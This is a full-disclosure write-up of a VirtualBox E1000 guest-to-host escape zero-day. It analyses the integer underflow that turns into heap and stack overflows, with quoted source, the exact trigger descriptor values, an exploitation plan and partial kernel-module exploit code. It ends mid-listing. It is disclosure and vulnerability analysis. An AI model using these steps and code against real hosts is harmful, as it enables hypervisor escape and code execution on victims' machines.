VirtualBox E1000 0day

Why

I like VirtualBox, and it has nothing to do with why I’m publishing a 0day vulnerability. The reason is my disagreement with the contemporary state of infosec, especially with security research and bug bounties:

  1. Waiting half a year for a vulnerability to be patched is considered fine.
  2. In the bug bounty field these are considered fine:
    1. Waiting more than a month for a submitted vulnerability to be verified and a buy/no-buy decision to be made.
    2. Changing the decision on the fly. Today you find out the bug bounty program will buy bugs in a piece of software; a week later you come with bugs and exploits and receive «not interested».
    3. Having no precise list of software a bug bounty program is interested in buying bugs in. Handy for bug bounty programs, awkward for researchers.
    4. Having no precise lower and upper bounds on vulnerability prices. Many things influence a price, but researchers need to know what is worth working on and what is not.
  3. Delusions of grandeur and marketing bullshit: naming vulnerabilities and creating websites for them; holding a thousand conferences a year; exaggerating the importance of one's own job as a security researcher; considering oneself «a world saviour». Come down, Your Highness.

I’m exhausted by the first two, therefore my move is full disclosure. Infosec, please move forward.

General Information

Vulnerable software: VirtualBox 5.2.20 and prior versions.

Host OS: any, the bug is in a shared code base.

Guest OS: any.

VM configuration: default (the only requirement is that the network adapter is Intel PRO/1000 MT Desktop (82540EM) and its mode is NAT).

How to protect yourself

Until a patched VirtualBox build is out you can change the network adapter of your virtual machines to PCnet (either of the two) or to Paravirtualized Network. If you can’t, change the mode from NAT to another one. The former way is more secure.

Introduction

The default VirtualBox network device is Intel PRO/1000 MT Desktop (82540EM), and the default network mode is NAT. We will refer to it as E1000.

The E1000 has a vulnerability allowing an attacker with root/administrator privileges in a guest to escape to the host ring 3. Then the attacker can use existing techniques to escalate privileges to ring 0 via /dev/vboxdrv.

Vulnerability Details

E1000 101

To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Packets consist of data link layer frames and other, higher-level headers. Packets supplied to the adapter are wrapped in Tx descriptors (Tx means transmit). A Tx descriptor is a data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores metainformation such as packet size, VLAN tag, TCP/IP segmentation flags, and so on.

The 82540EM datasheet defines three Tx descriptor types: legacy, context, and data. Legacy is deprecated, I believe. The other two are used together. The only thing we care about is that context descriptors set the maximum packet size and toggle TCP/IP segmentation, and that data descriptors hold physical addresses of network packets and their sizes. A data descriptor's packet size must be less than the context descriptor's maximum packet size. Usually context descriptors are supplied to the network card before data descriptors.

To supply Tx descriptors to the network card, a guest writes them to the Tx Ring, a ring buffer residing in physical memory at a predefined address. When all descriptors are written to the Tx Ring, the guest updates the E1000 MMIO TDT (Transmit Descriptor Tail) register to tell the host there are new descriptors to handle.
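
As a rough guest-side sketch of this mechanism (simplified and hypothetical, not the exploit's actual code: the descriptor layout is abbreviated and the ring is assumed to be filled from slot 0), everything boils down to writing descriptors into the ring and advancing TDT:

#include <stdint.h>

#define E1000_TDT 0x3818                 /* Transmit Descriptor Tail offset */

struct e1000_tx_desc {                   /* simplified 16-byte descriptor */
    uint64_t buffer_addr;                /* guest-physical address of data */
    uint32_t lower;                      /* DTALEN, DTYP, DCMD, ... */
    uint32_t upper;                      /* status, POPTS, special, ... */
};

static void kick_tx(volatile uint8_t *mmio, struct e1000_tx_desc *ring,
                    const struct e1000_tx_desc *descs, unsigned n)
{
    for (unsigned i = 0; i < n; i++)     /* place descriptors into the ring */
        ring[i] = descs[i];

    /* Advancing the tail index is what makes the host-side device emulation
       (e1kXmitPending and friends, see below) process the new descriptors. */
    *(volatile uint32_t *)(mmio + E1000_TDT) = n;
}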

Input

Consider the following array of Tx descriptors:

[context_1, data_2, data_3, context_4, data_5]

Let’s assign their structure fields as follows (the field names are made up for readability but map directly to the 82540EM specification):

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

We will see why they must be set like this in the step-by-step analysis below.

Root Cause Analysis

[context_1, data_2, data_3] Processing

Let’s assume the descriptors above are written to the Tx Ring in the specified order and the TDT register is updated by the guest. Now the host will execute the e1kXmitPending function in the src/VBox/Devices/Network/DevE1000.cpp file (most comments are, and will be, stripped for the sake of readability):

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

e1kTxDLazyLoad will read all 5 Tx descriptors from the Tx Ring. Then e1kLocateTxPacket is called for the first time. This function iterates through the descriptors to set up an initial state, but does not actually transmit anything. In our case the first call to e1kLocateTxPacket will take in the context_1, data_2, and data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be taken in on the second iteration of the while loop (we will cover it in the next section). This two-part split of the array is crucial for triggering the vulnerability, so let’s figure out why.

e1kLocateTxPacket looks like this:

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is of type E1K_DTYP_CONTEXT, so the e1kUpdateTxContext function is called. This function updates the TCP Segmentation Context if TCP segmentation is enabled for the descriptor. It is enabled for context_1, so the TCP Segmentation Context will be updated. (What the TCP Segmentation Context Update actually is does not matter; we will use the term only to refer to the code below.)

The second descriptor (data_2) is of type E1K_DTYP_DATA, so several actions irrelevant to this discussion are performed.

The third descriptor (data_3) is also of type E1K_DTYP_DATA, but since data_3.data_length == 0 no action is performed.

At this point the three descriptors have received their initial processing and two remain. Now the key point: after the switch statement there is a check whether the descriptor’s end_of_packet field was set. It is true for the data_3 descriptor (data_3.end_of_packet == true). The code performs some actions and returns from the function:

        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

If data_3.end_of_packet had been false, the remaining context_4 and data_5 descriptors would have been processed, and the vulnerability would have been avoided. Below you’ll see why this return from the function leads to the bug.

At the end of the e1kLocateTxPacket function we have the following descriptors ready to have network packets unwrapped from them and sent to a network: context_1, data_2, data_3. Then the inner loop of e1kXmitPending calls e1kXmitPacket. This function iterates through all the descriptors (5 in our case) to actually process them:

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor the e1kXmitDesc function is called:

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor passed to e1kXmitDesc is context_1. The function does nothing with context descriptors.

The second descriptor passed to e1kXmitDesc is data_2. Since all of our data descriptors have tcp_segmentation_enabled == true (pDesc->data.cmd.fTSE above), we end up in e1kFallbackAddToFrame, where an integer underflow will occur while data_5 is processed.

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

The most important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.

Let’s draw a table with the values of these variables before and after the execution of e1kFallbackAddToFrame for the two data descriptors.

Tx Descriptor   Before/After   u16MaxPktLen   pThis->u16TxPktLen   pDesc->data.cmd.u20DTALEN
data_2          Before         0x3010         0                    0x10
                After          0x3010         0x10                 0
data_3          Before         0x3010         0x10                 0
                After          0x3010         0x10                 0

You just need to note that when data_3 is processed, pThis->u16TxPktLen equals 0x10.

Next is the most important part. Please look again at the end of the snippet of e1kXmitPacket:

        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since data_3’s type != E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break out of the loop despite the fact that context_4 and data_5 are still to be processed. Why is this important? The key to understanding the vulnerability is that all context descriptors are meant to be processed before data descriptors: context descriptors are handled during the TCP Segmentation Context Update in e1kLocateTxPacket, whereas data descriptors are handled later, in the loop inside e1kXmitPacket. The developer’s intention was to forbid changing u16MaxPktLen after some data has been processed, to prevent integer underflows in the code:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we are able to bypass this protection: recall that in e1kLocateTxPacket we forced the function to return because data_3.end_of_packet == true. Because of that, two descriptors (context_4 and data_5) are left to be processed even though pThis->u16TxPktLen is 0x10, not 0. So it is possible to change u16MaxPktLen via context_4.maximum_segment_size and cause the integer underflow.

[context_4, data_5] Processing

Now that the first three descriptors have been processed, we again arrive at the inner loop of e1kXmitPending:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here we call e1kLocateTxPacket to do the initial processing of the context_4 and data_5 descriptors. As noted above, we can set context_4.maximum_segment_size to a value less than the size of the data already read, i.e. less than 0x10. Recall our input Tx descriptors:

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

As a result of the call to e1kLocateTxPacket the maximum segment size equals 0xF, whereas the size of the data already read is 0x10.

Finally, when processing data_5 we again arrive at e1kFallbackAddToFrame with the following variable values:

Tx Descriptor   Before/After   u16MaxPktLen   pThis->u16TxPktLen   pDesc->data.cmd.u20DTALEN
data_5          Before         0xF            0x10                 0x4188
                After

And therefore we have an integer underflow:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;
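
Note why the result is the full 32-bit 0xFFFFFFFF rather than 0xFFFF: both 16-bit operands are promoted to int, the subtraction yields -1, and converting that negative value to uint32_t wraps it around. A tiny standalone program (not VirtualBox code) reproduces the arithmetic with the values above:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    uint16_t u16MaxPktLen = 0x0 + 0xF;   /* context_4: u8HDRLEN + u16MSS   */
    uint16_t u16TxPktLen  = 0x10;        /* already accumulated from data_2 */

    uint32_t cb = u16MaxPktLen - u16TxPktLen;
    printf("cb = 0x%08X\n", (unsigned)cb);   /* prints: cb = 0xFFFFFFFF */
    return 0;
}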

This makes the following check true, since 0xFFFFFFFF > 0x4188:

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

The e1kFallbackAddSegment function will be called with size 0x4188. Without the vulnerability it is impossible to call e1kFallbackAddSegment with a size greater than 0x4000, because during the TCP Segmentation Context Update in e1kUpdateTxContext there is a check that the maximum segment size is less than or equal to 0x4000:

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

Buffer Overflow

We have called e1kFallbackAddSegment with size 0x4188. How can this be abused? I found at least two possibilities. First, data will be read from the guest into a heap buffer:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is a buffer of size 0x3FA0 and u16Len is 0x4188 — an obvious overflow that can lead, for example, to a function pointer overwrite.

Second, if we dig deeper we find that e1kFallbackAddSegment calls e1kTransmitFrame, which can, with a certain configuration of E1000 registers, call the e1kHandleRxPacket function. This function allocates a stack buffer of size 0x4000 and then copies data of a specified length (0x4188 in our case) into the buffer without any check:

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you can see, we turned an integer underflow into a classical stack buffer overflow. Both overflows described above, the heap one and the stack one, are used in the exploit.

Exploit

The exploit is a Linux kernel module (LKM) to be loaded in a guest OS. The Windows case would require a driver that differs from the LKM only in an initialization wrapper and kernel API calls.

Elevated privileges are required to load a driver in both OSes. This is common and isn’t considered an insurmountable obstacle. Look at the Pwn2Own contest, where researchers use exploit chains: a browser that opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0, and from there you have everything you need to attack a hypervisor from the guest OS. The most powerful hypervisor vulnerabilities are certainly those that can be exploited from guest ring 3. In VirtualBox there is also code reachable without guest root privileges, and it is mostly not audited yet.

The exploit is 100% reliable. That means it either always works or never works, because of mismatched binaries or other, more subtle reasons I didn’t account for. It works at least on Ubuntu 16.04 and 18.04 x86_64 guests with default configuration.

Exploitation Algorithm

  1. An attacker unloads e1000.ko, loaded by default in Linux guests, and loads the exploit’s LKM.
  2. The LKM initializes E1000 according to the datasheet. Only the transmit half is initialized since there is no need for the receive half.
  3. Step 1: information leak.
    1. The LKM disables E1000 loopback mode to make the stack buffer overflow code unreachable.
    2. The LKM uses the integer underflow vulnerability to cause the heap buffer overflow.
    3. The heap buffer overflow makes it possible to use the E1000 EEPROM to write any two bytes relative to a heap buffer within a 128 KB range. Hence the attacker gains a write primitive.
    4. The LKM uses the write primitive 8 times to write bytes into an ACPI (Advanced Configuration and Power Interface) data structure on the heap. The bytes are written to the index variable of a heap buffer from which a single byte will be read. Since the buffer size is smaller than the maximum index value (255), the attacker can read past the buffer and thereby gains a read primitive.
    5. The LKM uses the read primitive 8 times to access ACPI and obtain 8 bytes from the heap. Those bytes are a pointer into the VBoxDD.so shared library.
    6. The LKM subtracts the known RVA from the pointer to obtain the VBoxDD.so image base.
  4. Step 2: stack buffer overflow.
    1. The LKM enables E1000 loopback mode to make the stack buffer overflow code reachable.
    2. The LKM uses the integer underflow vulnerability to cause the heap buffer overflow and the stack buffer overflow. The saved return address (RIP/EIP) is overwritten. The attacker gains control.
    3. A ROP chain is executed to run a shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies the shellcode from the stack to just after itself. The shellcode is executed.
    2. The shellcode performs the fork and execve syscalls to spawn an arbitrary process on the host side.
    3. The parent process performs process continuation.
  6. The attacker unloads the LKM and loads e1000.ko back to let the guest use the network. (A skeleton of how the LKM ties these steps together is sketched below.)
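
A hedged sketch of how the LKM could tie these stages together is shown here; the stage functions and g_tx_ring are the ones presented later in this article, while the module plumbing itself is an assumption:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>

extern void* g_tx_ring;                        /* allocated in e1000_init() */

void*    map_mmio(void);
void     e1000_init(void* mmio);
uint64_t stage_1_main(void* mmio, void* tx_ring);
void     stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base);

static int __init exploit_init(void)
{
    void*    mmio;
    uint64_t vboxdd_base;

    mmio = map_mmio();                         /* map E1000 MMIO registers */
    if (!mmio)
        return -ENODEV;

    e1000_init(mmio);                          /* configure the transmit half */

    vboxdd_base = stage_1_main(mmio, g_tx_ring);   /* Step 1: ASLR bypass */
    stage_2_main(mmio, g_tx_ring, vboxdd_base);    /* Step 2: RIP control */
    return 0;
}

static void __exit exploit_exit(void) {}

module_init(exploit_init);
module_exit(exploit_exit);
MODULE_LICENSE("GPL");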

Initialization

The LKM maps the physical memory corresponding to E1000 MMIO. The physical address and size are predefined by the hypervisor.

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

Then the E1000 general purpose registers are configured, Tx Ring memory is allocated, and the transmit registers are configured.

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}
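
The configure_* helpers are not shown here; as a hedged sketch of what the Tx-related ones most likely do (register offsets are from the 82540EM datasheet, while the MAX_TX_RING_SIZE value and the exact helper bodies are assumptions), they point the device at g_tx_ring and set the ring length:

#include <linux/io.h>
#include <linux/types.h>
#include <asm/io.h>

#define E1000_TDBAL 0x3800            /* Tx Descriptor Base Address Low    */
#define E1000_TDBAH 0x3804            /* Tx Descriptor Base Address High   */
#define E1000_TDLEN 0x3808            /* Tx Descriptor ring Length (bytes) */

#define MAX_TX_RING_SIZE 4096         /* assumed value; must be a multiple of 128 */

extern void* g_tx_ring;

void configure_TDBAL(void* mmio) {
    /* kmalloc memory is physically contiguous, so virt_to_phys() is enough */
    writel((u32)virt_to_phys(g_tx_ring), (u8 __iomem*)mmio + E1000_TDBAL);
}

void configure_TDBAH(void* mmio) {
    writel((u32)(virt_to_phys(g_tx_ring) >> 32), (u8 __iomem*)mmio + E1000_TDBAH);
}

void configure_TDLEN(void* mmio) {
    writel(MAX_TX_RING_SIZE, (u8 __iomem*)mmio + E1000_TDLEN);
}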

ASLR Bypass

Write primitive

From the beginning of exploit development I decided not to use primitives found in services disabled by default. This primarily means the Chromium service (not the browser) that provides 3D acceleration, in which researchers have found more than 40 vulnerabilities over the last year.

The problem was to find an information leak in the default VirtualBox subsystems. The obvious thought was that if the integer underflow allows overflowing the heap buffer, then we control everything past the buffer. We’ll see that not a single additional vulnerability was required: the integer underflow turned out to be powerful enough to derive read, write, and information leak primitives from it, not to mention the stack buffer overflow.

Let’s examine what exactly is overflowed on the heap.

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is a buffer of size 0x3FA0 which will be overflowed with bytes copied from a data descriptor. Searching for interesting fields after the buffer, I came to the E1kEEPROM structure, which contains another structure with the following fields (src/VBox/Devices/Network/DevE1000.cpp):

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

How can we abuse them? E1000 implements an EEPROM, a secondary adapter memory. The guest OS can access it via E1000 MMIO registers. The EEPROM is implemented as a finite state machine with several states and four operations. We are interested only in «write to memory». This is how it looks (src/VBox/Devices/Network/DevEEPROM.cpp):

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of the EEPROM93C46 structure that we control. We can malform them in such a way that the statement

m_au16Data[u32Addr] = u16Value;

will write two bytes at an arbitrary 16-bit offset from m_au16Data, which also resides in the structure. We have found a write primitive.
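
For illustration, the part of the overflowing guest data that lands on top of these fields could be crafted roughly as follows (a minimal sketch: the offset of the EEPROM fields within the payload is an assumption, since it depends on the distance between aTxPacketFallback and the eeprom member of E1kState_st):

#include <stdint.h>
#include <string.h>

/* Mirrors the EEPROM93C46 fields we want to control (see the excerpt above). */
struct eeprom_ctrl_fields {
    uint8_t  m_fWriteEnabled;    /* non-zero so storeWord() actually stores */
    uint8_t  Alignment1;
    uint16_t m_u16Word;          /* the two bytes that will be written */
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;          /* word index into m_au16Data, i.e. the target */
    uint32_t m_u32InternalWires;
};

static void craft_payload(uint8_t* payload, size_t off_eeprom_in_payload,
                          uint16_t target_word_index, uint16_t value)
{
    struct eeprom_ctrl_fields f = {
        .m_fWriteEnabled = 1,
        .m_u16Word       = value,
        .m_u16Addr       = target_word_index,
    };
    memcpy(payload + off_eeprom_in_payload, &f, sizeof(f));
}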

Read primitive

The next problem was to find data structures on the heap to write arbitrary data into, the main goal being to leak a shared library pointer in order to get its image base. Fortunately, no unstable heap spray was needed, because the virtual devices’ main data structures turn out to be allocated from an internal hypervisor heap in such a way that the distance between them is always constant, even though their virtual addresses are, of course, randomized by ASLR.

When a virtual machine is launched the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I traced that code under GDB using a script and got these results:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

Note the E1000 device at position #0xE. It can be seen in the second list that the following device is at offset 0x5700 from E1000, the next one at 0x19E0, and so on. As already said, these distances are always the same, and that is our exploitation opportunity.

The devices following E1000 are ICH AC'97, OHCI, ACPI, and VirtualBox GIM. Studying their data structures, I figured out a way to use the write primitive.
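
Using the deltas from the trace above, the constant distance from the E1000 instance to the ACPI instance can be expressed as simple arithmetic (illustrative only; the concrete numbers are the ones observed in this particular build):

#define DELTA_E1000_TO_ICHAC97  0x5700
#define DELTA_ICHAC97_TO_OHCI   0x19E0
#define DELTA_OHCI_TO_ACPI      0x1990

#define DELTA_E1000_TO_ACPI  (DELTA_E1000_TO_ICHAC97 + \
                              DELTA_ICHAC97_TO_OHCI  + \
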